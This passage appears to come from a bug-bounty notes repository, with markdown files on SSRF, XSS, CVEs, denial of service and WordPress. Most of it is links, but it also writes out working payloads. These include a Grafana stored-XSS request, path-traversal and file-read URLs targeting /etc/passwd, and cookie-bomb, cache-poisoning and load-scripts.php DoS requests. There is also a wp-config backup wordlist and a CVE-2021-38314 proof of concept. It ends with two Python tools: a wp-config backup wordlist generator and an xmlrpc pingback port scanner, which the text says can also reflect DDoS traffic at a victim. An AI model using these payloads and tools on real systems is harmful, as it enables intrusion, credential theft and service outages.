Guesthouse (Recon Wins) 38 | https://medium.com/@th3g3nt3l/how-i-found-an-ssrf-in-yahoo-guesthouse-recon-wins-8722672e41d4 39 | 40 | ## dnsteal - DNS Exfiltration tool for stealthily sending files over DNS requests 41 | https://hakin9.org/dnsteal-dns-exfiltration-tool-for-stealthily-sending-files-over-dns-requests/ 42 | 43 | ## Blind SSRF in URL Validator 44 | https://yasshk.medium.com/blind-ssrf-in-url-validator-93cbe7521c68 45 | 46 | ## Hacking google drive integration 47 | https://github.com/httpvoid/writeups/blob/main/Hacking-Google-Drive-Integrations.md 48 | 49 | ## Larksuite ssrf protection bypass to exfiltrate aws metadata 50 | https://sirleeroyjenkins.medium.com/bypassing-ssrf-protection-to-exfiltrate-aws-metadata-from-larksuite-bf99a3599462 51 | 52 | ## 53 | https://github.com/Damian89/extended-ssrf-search 54 | 55 | ## 56 | https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51 57 | 58 | 59 | ## An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerability 60 | https://github.com/assetnote/blind-ssrf-chains 61 | 62 | ## SVG SSRFs and saga of bypasses 63 | https://infosecwriteups.com/svg-ssrfs-and-saga-of-bypasses-777e035a17a7 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /XSS.md: -------------------------------------------------------------------------------- 1 | ## 1. Browser's XSS Filter Bypass Cheat Sheet 2 | 3 | https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet 4 | 5 | ## 2. Stored XSS using file upload 6 | https://medium.com/@vis_hacker/how-i-got-stored-xss-using-file-upload-5c33e19df51e 7 | 8 | ## 3. XSS Through Parameter Pollution 9 | https://infosecwriteups.com/xss-through-parameter-pollution-9a55da150ab2 10 | 11 | ## 4. XSS via HTTP Headers 12 | https://brutelogic.com.br/blog/xss-via-http-headers/ 13 | 14 | ## 5. Blind XSS in svg file 15 | ``` 16 | 17 | 20 | 26 | 27 | 28 | 33 | 34 | ``` 35 | 36 | ## 6. 
PostMessage XSS 37 | ``` 38 | https://medium.com/@youghourtaghannei/postmessage-xss-vulnerability-on-private-program-18e773e1a1ba 39 | ``` 40 | ## 7. Flash Based Reflected XSS 41 | ``` 42 | http://www.domain.com/jwplayer/player.swf?playerready=alert(document.domain) 43 | ``` 44 | https://hackerone.com/reports/859806 45 | 46 | ## 8. XSS in .Net 47 | https://blog.isec.pl/all-is-xss-that-comes-to-the-net/ 48 | 49 | ## 9. DOMXSS WIKI 50 | https://github.com/wisec/domxsswiki/wiki 51 | 52 | ## 10. Reflected XSS Through Insecure Dynamic Loading 53 | https://infosecwriteups.com/reflected-xss-through-insecure-dynamic-loading-dbf4d33611e0 54 | 55 | ## 11. Uber Bug Bounty: Turning Self-XSS into Good-XSS 56 | https://whitton.io/articles/uber-turning-self-xss-into-good-xss/ 57 | 58 | ## 12. Multi Domain DOM Cross Site Scripting 59 | https://coffeejunkie.me//Multi-Domain-DOM-Cross-Site-Scripting/ 60 | 61 | ## 13. Hunting for XSS with CodeQL 62 | https://medium.com/codex/hunting-for-xss-with-codeql-57f70763b938 63 | 64 | ## 14. PNG IDAT chunks XSS payload generator 65 | https://github.com/vavkamil/xss2png 66 | 67 | ## 15. XSS to Account takeover in payu.in 68 | https://blog.amanrawat.in/2021/02/01/xss-to-account-takeover-payu.html 69 | 70 | ## 16. Magic Header Blind Xss tool (deliver blind xss payloads in request headers). 
https://github.com/adrianscheff/pegaxss

## What Bypassing Razer's DOM-based XSS Patch Can Teach Us
https://edoverflow.com/2022/bypassing-razers-dom-based-xss-filter/

## Solving DOM XSS puzzles
https://spaceraccoon.dev/solving-dom-xss-puzzles

## Fuzzing for XSS via nested parsers condition
https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/

## XSS filter bypass via spell checking
https://brutelogic.com.br/blog/xss-filter-bypass-spell-checking/

-------------------------------------------------------------------------------- /CVES.md: --------------------------------------------------------------------------------
## CVE-2020-11022/CVE-2020-11023 (jQuery htmlPrefilter XSS)
https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html

## CVE-2020-11110 (Grafana stored XSS via snapshot)
https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

* version: Grafana v6.2.5
* authentication: not required (the writeup's v6.2.5 target accepted snapshot creation without logging in)
* send a POST request to /api/snapshots with the following JSON body; the `javascript:` URI in `snapshot.originalUrl` becomes the snapshot's "open original dashboard" link and runs when a victim viewing the snapshot clicks it
```
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
```

## CVE-2021-24169
WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)

```
wp-admin/admin.php?page=wc-order-export&tab=
```

## CVE-2021-40875
Improper access control in Gurock TestRail versions ≤ 7.2.0.3014 results in sensitive file exposure

* The /files.md5 file on the client side of a Gurock TestRail application discloses a full list of application files and their paths. Those paths can then be requested directly and, in some cases, disclose hardcoded credentials, API keys or other sensitive data.

## CVE-2021-26084
Remote Code Execution on Confluence Servers

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

## CVE-2021-24563 Unauthenticated Stored XSS [Frontend Uploader <= 1.3.2]
https://medium.com/pentesternepal/cve-2021-24563-unauthenticated-stored-xss-frontend-uploader-1-3-2-8522e0890833

## CVE-2021-38647 is an unauthenticated RCE vulnerability affecting the OMI agent, which runs as root
https://github.com/horizon3ai/CVE-2021-38647

## Metabase sensitive information disclosure (arbitrary file read through the GeoJSON API), CVE-2021-41277
```
GET /api/geojson?url=file:/etc/passwd HTTP/1.1
Host:
```

## Full disclosure reports
https://seclists.org/fulldisclosure/

## CVE finder
https://git-cve.system00-sec.com/?cve=CVE-2021-1056

## RCE 0-day for GhostScript 9.50 - payload generator
https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50

## ResourceSpace (CVE-2021-41765 | CVE-2021-41950 | CVE-2021-41951)
https://www.horizon3.ai/multiple-vulnerabilities-in-resourcespace/

## Tool that embeds a PostScript file into a PDF so that GhostScript runs the PostScript code while processing the PDF
https://github.com/neex/ghostinthepdf

## CVE-2021-21234 Spring Boot Actuator Logview Directory Traversal
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/
```
http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../
```

## CVE-2021-39316 WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
https://cxsecurity.com/issue/WLB-2021120012
```
http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd
```

## log4j
https://github.com/0xInfection/LogMePwn
https://github.com/adilsoybali/Log4j-RCE-Scanner

## Exploit search
https://sploitus.com/?query=cve#exploits

-------------------------------------------------------------------------------- /DOS.md: --------------------------------------------------------------------------------
## 1. Denial of service with web cache poisoning
https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning

## 2. DoS using
```
(((((()0)))))
```
https://hackerone.com/reports/993582

## 3. Overflow Trilogy (HTTP response splitting with header overflow | denial of service with cookie bomb | DOM-based cookie bomb)
https://blog.innerht.ml/overflow-trilogy/

## 4. Cookie bomb
```
https://target.com/index.php?param1=xxxxxxxxxxxxxx
```
After sending "xxxxxxxxxxxxxx" as the value of param1, check your cookies. If a cookie now holds the value "xxxxxxxxxxxxxx", the parameter is reflected into a cookie and the site is vulnerable: repeat with a value of several kilobytes (or several such parameters) so that the victim's total cookie size exceeds the server's request-header limit, after which every request from that browser is rejected with an error until the cookie expires or is cleared.

## 5. Try submitting a very long value in a form, for example a very long password or e-mail address
```
POST /Register
[...]

username=victim&password=aaaaaaaaaaaaaaa
```

## 6. Pixel flood, using an image with a huge pixel count
The file itself is small, but its header declares enormous dimensions, so the server-side image library tries to allocate the full bitmap when it decodes the upload.

Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0) (time-limited presigned S3 link from 2020, long since expired)

## 7. Frame flood, using a GIF with a huge number of frames

Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/136/902000ac102f14a36a4d83ed9b5c293017b77fc7/uber.gif?response-content-disposition=attachment%3B%20filename%3D%22uber.gif%22%3B%20filename%2A%3DUTF-8%27%27uber.gif&response-content-type=image%2Fgif&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ245MJJPA%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110848Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFMaCXVzLXdlc3QtMiJHMEUCIEC768ifpRHeEUucuNuVL%2FdcSsWMnGeNp%2FMhKs6afB01AiEAiZOP%2FwMaeQMITUni3aFcACIOqOHnWHgLKuXHRrb5LooqtAMIXBABGgwwMTM2MTkyNzQ4NDkiDHHy9PJ2ccl9cmsvyCqRA6bliBHBMPXR6NYflM%2BCXCCQ5VLdPCATpmLs9DhVuYsjxR3JUtVHnBvtfEYYWDWWsLoC3xuzmug5ycrAvqK%2BTYDYO7l4HD1rXfyEBkR579ZlUFab6bOL4i8nDqblun%2FeV253Sgd6GzL4E%2FXmUN%2FC6qNydSd9hp2fLoyNjqob6o5zJjmnqvZsq50ROOZwf1idkDtr163qeVZERnan7aY9rM%2FsX4iVdE4wY0rLw1maGRuDF2aLVCxPB681htsHt%2FpoZ18QY7LjcbNjbjB4PgXLd1sm5zQ4q9mPVxTZPvzo9BJCh7l6kMLHCtJXOXfrvvN8UBgIqr1KXvodzv7FRQYcvEpfw4pwCTWzBs8VeEcwS9gjOXFMNLNI8SZ9V76VQ5KrOIpKhzM9UQQN3DVzY3SwMHydX%2B%2BYcQTt%2FjvqTkorsltqob2g5E1K0U8btRLBvBqOo0Vbr75zLcLUUomDBQzSNSvJgTN43huYmkZxBpWAAId72Tt6m56aFQLXkCKGSoMxYjrrVW9jc37pVl3lZU7FIX0AMIuN6PoFOusBpDCrjFwR1Y7t7W8wLapYjI6yOkkvWTFwWvx38jZl9okqo5xchKolmKxKX7cfGPIyuUmSXc1xa0nKwYeOYlhQZfyI0NobqyWW81ITuuUjsBxULuqrXqfVl0PTjTTpqe%2FHvU6wYSE358XfggtcqaH9PPgNDOejgv%2FLnh9AH9nyqIWuaCu865IfAOupVVzFzQilyB2LDyQtTS4Kp5dHyEAibRQlqeKHWOkUE2mQefAaTxKLRKrs0mJQYSuC%2B4LQEB3Cq9Nhj5HN%2BYT7A7CDLrvyChyfYXQZYr0lR1jN91Yd7SBe2jB1Qls%2Bx%2FEUlQ%3D%3D&X-Amz-Signature=910a3812cf3b69f6fa72f39a89a6df2f395f8d17ef8702eeb164a0477c64fff5) (time-limited presigned S3 link from 2020, long since expired)

## 8. Sometimes a website has a parameter that adjusts the size of an image, for example
```
https://target.com/img/vulnerable.jpg?width=500&height=500
```
Try changing "500" to "99999999999"
```
https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999
```

## 9. Try giving a header a value the server does not expect, for example duplicated encodings:
```
Accept-Encoding: gzip, gzip, deflate, br, br
```

## 10. Sometimes, while testing for "no rate limit", the server goes down after a long run simply because of the volume of requests

## 11. ReDoS (regex DoS) occurs when a poorly written regular expression (nested or overlapping quantifiers, e.g. `^(a+)+$`) is evaluated against attacker-controlled input; a non-matching input of a few dozen characters then takes exponential time to reject

## 12. CPDoS ([Cache Poisoned Denial of Service](https://cpdos.org/))

The common idea: send a request that the origin rejects but the cache accepts and stores; the cached error page is then served to every other visitor of that URL.

- HTTP Header Oversize (HHO)

A malicious client sends an HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache
```
GET /index.html HTTP/1.1
Host: victim.com
X-Oversized-Header-1: Big_Value
```
The response is
```
HTTP/1.1 400 Bad Request
...
Header size exceeded
```
- HTTP Meta Character (HMC)

This attack tries to bypass the cache with a request header containing a harmful meta character. Meta characters can be, e.g., control characters such as line feed (\n), carriage return (\r) or bell (\a).
```
GET /index.html HTTP/1.1
Host: victim.com
X-Meta-Malicious-Header: \r\n
```
The response is
```
HTTP/1.1 400 Bad Request
...
Character not allowed
```
- HTTP Method Override (HMO)

Several non-standard headers, honoured by some frameworks and proxies, override the method of the original request. Some of them are:
```
1. X-HTTP-Method-Override
2. X-HTTP-Method
3. X-Method-Override
```
The header instructs the application to override the HTTP method of the request.
```
GET /index.php HTTP/1.1
Host: victim.com
X-HTTP-Method-Override: POST
```
The response is
```
HTTP/1.1 404 Not Found
...
POST on /index.php not found
```

- X-Forwarded-Port (the `dontpoisoneveryone=1` query parameter is a cache buster, so only your own cache key is poisoned while testing)
```
GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Port: 123
```

- X-Forwarded-Host
```
GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Host: www.hackerone.com:123
```

![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png)

References:
- [Hackerone #840598](https://hackerone.com/reports/840598)
- [Hackerone #105363](https://hackerone.com/reports/105363)
- [Hackerone #390](https://hackerone.com/reports/390)
- [Hackerone #400](https://hackerone.com/reports/400)
- [Hackerone #751904](https://hackerone.com/reports/751904)
- [Hackerone #861170](https://hackerone.com/reports/861170)
- [Hackerone #892615](https://hackerone.com/reports/892615)
- [Hackerone #511381](https://hackerone.com/reports/511381)
- [Hackerone #409370](https://hackerone.com/reports/409370)
- [CPDoS](https://cpdos.org/)
-------------------------------------------------------------------------------- /CMS/WordPress.md: --------------------------------------------------------------------------------
## 1. Create database
```
/wp-admin returns 403
Bypass it using /wp-admin/setup-config.php?step=1
If the installation was never completed, this page is still reachable and shows the database-settings form, so you can point the site at a database you control and finish the installer
```

## 2. xmlrpc.php

This is one of the most common findings on WordPress.
To be paid for this misconfiguration you have to exploit it fully and demonstrate the impact properly.

## Detection
* Visit site.com/xmlrpc.php
* You get the error message that the endpoint accepts POST requests only
## Exploit
* Intercept the request and change the method from GET to POST
* List all methods
```
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```
* Check whether the pingback.ping method is present
* Use the site as a DDoS reflector: pingback.ping makes the WordPress server fetch the source URL, so many WordPress sites can be pointed at one victim
```
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<victim>:<port>/</string></value></param>
<param><value><string>http://<wordpress-site>/<existing-post>/</string></value></param>
</params>
</methodCall>
```
* Perform SSRF (internal port scan only): point the source URL at an internal host and port; the fault code and message in the reply differ between ports that answered and ports that did not
```
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<internal-ip>:<port>/</string></value></param>
<param><value><string>http://<wordpress-site>/<existing-post>/</string></value></param>
</params>
</methodCall>
```
## 3. WP user enumeration
This is only accepted as a finding when the target hides its users, i.e. the usernames are not public anyway; an attacker can use the enumerated names for brute-forcing and other attacks.

## Detection
```
site.com/wp-json/wp/v2/users/
http://target.com/?author=1
http://target.com/?rest_route=/wp/v2/users
```
* The REST endpoints return JSON with user info in the response; the `?author=1` variant redirects to the author archive, whose URL contains the username

## 4. Denial of service via load-scripts.php
(CVE-2018-6389: load-scripts.php is reachable without authentication and concatenates every script named in `load[]`, so each request costs the server a lot of CPU and I/O; WordPress considers this a server-level DoS and has not changed core for it)
```
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
```
[h1 report](https://hackerone.com/reports/752010)

## 5. Denial of service via load-styles.php
```
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
```
## 6. Log files exposed
```
http://target.com/wp-content/debug.log
```
## 7. Backup copies of wp-config exposed
```
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
wp-config.html
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html
wp-config.php~
```

## WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)

```
wp-admin/admin.php?page=wc-order-export&tab=
```

## WordPress plugin update confusion - the full guide on how to scan for and mitigate the next big supply-chain attack
https://galnagli.com/Wordpress_Plugin_Update_Confusion/

## Unauthenticated Sensitive Information Disclosure (CVE-2021-38314)
### Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress
https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c

```
Proof of Concept:
1. Found subdomain blog.redacted.com is using WordPress, then try CVE-2021-38314
2. Using this script
$target = "https://blog.redacted.com";
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
3. It returns e24eb61b09bf2340779b35xxxxxxxxxx, a hash of the auth_key_secret_key with "-redux" appended.
4. Append "-support" and md5 it again; that's the new function hook name.
$key3 = md5($key2.'-support');
5. Then get the hash 1505d4269113e1bda36c47xxxxxxxxxx
6. So what this code does is compare the code param with the output of https://verify.redux.io/?hash=1505d4269113e1bda36c47xxxxxxxxxx&site=http://blog.redacted.com/
$redux_code = b1mzZ3%2BU0p43TZ6%2F7QJaYU0hJMHgdcT5Bc%2Bnyo4t3xUenDRm0Ef8HipC7EMKSdtpw8g65XZjxxxxxxxxxxxxxxxxxxxx
7. Final URL https://blog.redacted.com/wp-admin/admin-ajax.php?action=1505d4269113e1bda36c47xxxxxxxxxx&code=b1mzZ3%2BU0p43TZ6%2F7QJaYU0hJMHgdcT5Bc%2Bnyo4t3xUenDRm0Ef8HipC7EMKSdtpw8g65XZjxxxxxxxxxxxxxxxxxxxx
```


```
For the WordPress wp-config file, if the main endpoint is forbidden we can also check for backup copies. The web server only runs files ending in .php through PHP, so a copy with any other extension is served as plain text, database credentials included

redacted[.]com/wp-config.php => 403 Forbidden

redacted[.]com/wp-config.php_orig => 200 OK

Also try:
_new _old _orig _bkp _bak with dashes, fullstops and underscores
```


--------------------------------------------------------------------------------
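The suffix list in section 7 and the "dashes, fullstops and underscores" tip above can be expanded into one wordlist for ffuf or dirsearch. The following is an added example, not code from the original notes; it uses only the suffixes and separators listed in this file, and the function names (`wp_config_candidates`, `as_paths`) are mine.

```python
"""
Build a wordlist of wp-config.php backup/leftover names.

Added example (not part of the original notes): expands the suffixes
and separators listed in this file into every combination, so the
result can be fed to a directory brute-forcer.
"""
from itertools import product

BASES = ("wp-config.php", "wp-config")
SEPARATORS = (".", "_", "-")          # "fullstops, underscores and dashes"
SUFFIXES = ("bak", "old", "orig", "new", "bkp", "save", "swp", "dist",
            "inc", "txt", "html", "zip")
# Editor/backup artefacts that do not follow the base+separator+suffix shape.
EXTRA = (".wp-config.php.swp", "wp-config.php~")


def wp_config_candidates():
    """Return the candidate file names, de-duplicated, in a stable order."""
    seen = set()
    out = []
    for base, sep, suffix in product(BASES, SEPARATORS, SUFFIXES):
        name = f"{base}{sep}{suffix}"
        if name not in seen:
            seen.add(name)
            out.append(name)
    for name in EXTRA:
        if name not in seen:
            seen.add(name)
            out.append(name)
    return out


def as_paths(site):
    """Full URLs for one site, e.g. https://redacted.com/wp-config.php_orig."""
    return [f"{site.rstrip('/')}/{name}" for name in wp_config_candidates()]


if __name__ == "__main__":
    # One name per line: pipe into ffuf -w /dev/stdin or save as a wordlist.
    print("\n".join(wp_config_candidates()))
```

When checking the hits, compare each 200 against the response for a random name that cannot exist: a theme that answers every unknown path with a styled 404 and status 200 will otherwise make the whole list look "found". A real hit is a plain-text body that starts with `<?php` and contains `DB_PASSWORD`.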
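The xmlrpc.php checks in section 2 above (list the methods, then use `pingback.ping` as an internal port scan) can be driven from a script instead of a proxy. The following is an added example, not code from the original notes: it builds the XML-RPC bodies with the standard library, parses the replies, and decides from the pingback fault whether the internal host:port answered. The sample replies at the bottom are constructed for offline use, and the fault codes it keys on are an assumption (16 for "source URL does not exist", i.e. nothing answered; 17 for "no link to the target", i.e. something answered), so calibrate them against a known-closed and a known-open port before trusting the result.

```python
"""
Probe a WordPress xmlrpc.php endpoint: enumerate methods and turn
pingback.ping into an internal port scan.

Added example, not code from the original notes. Function names are mine;
the fault codes below are an assumption about WordPress's pingback
replies and must be calibrated per target.
"""
import urllib.request
import xmlrpc.client
from typing import Dict, List, Optional
from xmlrpc.client import Fault

FAULT_SOURCE_MISSING = 16   # assumed: WordPress could not fetch the source URL
FAULT_NO_LINK = 17          # assumed: fetched it, but it does not link to the target


def list_methods_request() -> str:
    """Body of the system.listMethods call shown in section 2."""
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def pingback_request(source_uri: str, target_uri: str) -> str:
    """Body of pingback.ping: WordPress fetches source_uri to verify that it
    links to target_uri, which must be an existing post on the WordPress site."""
    return xmlrpc.client.dumps((source_uri, target_uri), methodname="pingback.ping")


def methods_from_response(body: str) -> List[str]:
    """Method names from a system.listMethods reply."""
    params, _ = xmlrpc.client.loads(body)
    return list(params[0])


def pingback_fault_code(body: str) -> Optional[int]:
    """Fault code of a pingback reply, or None if the pingback was accepted."""
    try:
        xmlrpc.client.loads(body)
    except Fault as fault:
        return fault.faultCode
    return None


def reachable_ports(replies: Dict[int, str]) -> List[int]:
    """Ports whose reply was anything other than 'source URL does not exist':
    a different fault (or success) means the server got an answer from that port."""
    return sorted(port for port, body in replies.items()
                  if pingback_fault_code(body) != FAULT_SOURCE_MISSING)


def post_xmlrpc(endpoint: str, body: str, timeout: float = 10.0) -> str:
    """Send one call to <site>/xmlrpc.php (live use only; not exercised offline)."""
    req = urllib.request.Request(endpoint, data=body.encode(), method="POST",
                                 headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# --- constructed sample replies so the logic can be run offline --------------
SAMPLE_LIST = xmlrpc.client.dumps(
    (["system.listMethods", "wp.getUsersBlogs", "pingback.ping"],), methodresponse=True)


def fault_reply(code: int, message: str) -> str:
    """Constructed methodResponse carrying a fault, shaped like WordPress's."""
    return xmlrpc.client.dumps(Fault(code, message))


SAMPLE_SCAN = {
    22: fault_reply(FAULT_SOURCE_MISSING, "The source URL does not exist."),
    80: fault_reply(FAULT_NO_LINK, "The source URL does not contain a link to the target URL."),
    3306: fault_reply(FAULT_SOURCE_MISSING, "The source URL does not exist."),
    8080: fault_reply(FAULT_NO_LINK, "The source URL does not contain a link to the target URL."),
}

if __name__ == "__main__":
    methods = methods_from_response(SAMPLE_LIST)
    print("methods:", methods)
    print("pingback.ping available:", "pingback.ping" in methods)
    print("ports that answered:", reachable_ports(SAMPLE_SCAN))
    # Request body you would send for one port of a live scan:
    print(pingback_request("http://10.0.0.5:8080/", "http://target.com/?p=1"))
```

For a live scan, loop over the ports, call `post_xmlrpc("https://target.com/xmlrpc.php", pingback_request(f"http://10.0.0.5:{port}/", post_url))` and collect the bodies into the dict that `reachable_ports` expects; `post_url` has to be a real post, otherwise the server rejects the target before it ever fetches the source. The same `pingback_request` with the victim's URL as `source_uri` is the DDoS reflection case from section 2.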